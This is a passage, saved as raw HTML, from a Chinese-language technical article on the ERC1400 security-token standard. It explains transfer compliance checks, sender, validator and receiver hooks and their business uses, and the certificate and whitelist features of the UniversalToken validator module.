normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">违规股份强制回收(Compliance Violation Enforcement)</span></span></p></li></ul><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.2.3 转账机制与合规检查</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">转账是证券交易的核心功能，ERC1400 为此设计了多层次的转账机制，既要保证 ERC20 的兼容性，又要满足证券监管的特殊要求。</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">默认分区转账机制是一个精巧的设计。</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">分区转账功能则提供了显式的分区操作能力。</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">转账过程中的合规检查是多层次的。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在现实世界的证券通证化实践中，转账机制能够映射多种复杂的金融业务场景：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">二级市场交易(Secondary Market Trading)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DVP 结算(Delivery Versus Payment)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">托管账户调拨(Custodial Rebalancing)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">跨境合规(Travel Rule)</span></span></p></li></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">2.3 扩展钩子(Hooks) 系统 - 可插拔的合规模块</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在前面探讨转账机制时，就提到了系统会执行多层次的合规检查，而这些检查的具体实现正是依赖于 ERC1400 的钩子系统 。</span></span></p><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.3.1 发送方钩子</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">发送方钩子在代币离开持有者地址之前被调用，是三层钩子机制中的第一道关卡。与代币验证器钩子不同，发送方钩子是由代币持有者自行注册的，这意味着每个地址都可以定制自己的转账前逻辑。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">发送方钩子在证券业务中的典型应用场景：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">交易量限制(Trading Volume Limit)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">交易税自动扣除(Automatic Tax Deduction)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审计日志记录(Audit Trail Logging)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">内部交易监控(Insider Trading Monitoring)</span></span></p></li></ul><p><b data-pm-slice="0 0 []"><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h5&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:5},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 16px;font-weight: bold;">2.3.2 代币验证器钩子的核心地位</span></span></h5></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代币验证器是整个合规体系的核心，它与发送方钩子和接收方钩子有本质区别：验证器钩子是由代币合约本身通过 ERC1820 注册的全局钩子，而非由用户注册的个人钩子。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在现实世界的证券通证化实践中，验证器钩子能够映射多种复杂的金融业务场景：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">KYC/AML 白名单验证(KYC/AML Whitelist)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">制裁名单黑名单过滤(Sanctions Screening)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">紧急熔断机制(Circuit Breaker)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意收购防御</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">链下审批证书验证(Off-chain Approval Certificate)</span></span></p></li></ul><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.3.3 接收方钩子的创新应用</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">接收方钩子在代币到达接收地址之后被调用，是三层钩子机制中的最后一环。与发送方钩子类似，接收方钩子也是由接收地址自行注册的，允许接收方在收到代币后执行自定义的业务逻辑。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">接收方钩子在证券业务中的典型应用场景：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">自动分红再投资(Automatic Dividend Reinvestment)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">托管账户自动记账(Custodial Auto-booking)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投票权自动登记(Voting Right Auto-registration)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ETF 申购与赎回</span></span></p></li></ul><p dir="ltr" style="margin-top:12pt;text-indent:0px;line-height:25.6px;margin-bottom:0px;text-align:left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3、扩展合约模块详解</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本章将视角下沉至代码实现层面，深入剖析 UniversalToken 库中这些扩展模块的具体工程实现细节与技术抉择。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.1 ERC1400TokensValidator - 合规引擎的技术实现</span></span></h4><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">3.1.1 证书验证机制</span></span></h5></b></p><p><b data-pm-slice="0 0 []"><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">证书验证是 ERC1400TokensValidator 最具特色的功能之一，它实现了链下审批与链上执行的结合。这种机制的核心理念是：复杂的合规判断在链下进行，而链上只验证审批结果的真实性。</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">证书验证支持两种模式：基于 Nonce 的验证和基于 Salt 的验证。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">3.1.2 白名单与黑名单的动态管理</span></span></p></b></p><p><b data-pm-slice="0 0 []"><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">白名单和黑名单机制是证券合规的基础工具，采用了基于角色的访问控制(RBAC) 模式，结合 OpenZeppelin 的角色管理库实现。</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">3.1.3 Hold 功能实现条件性资金锁定</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: 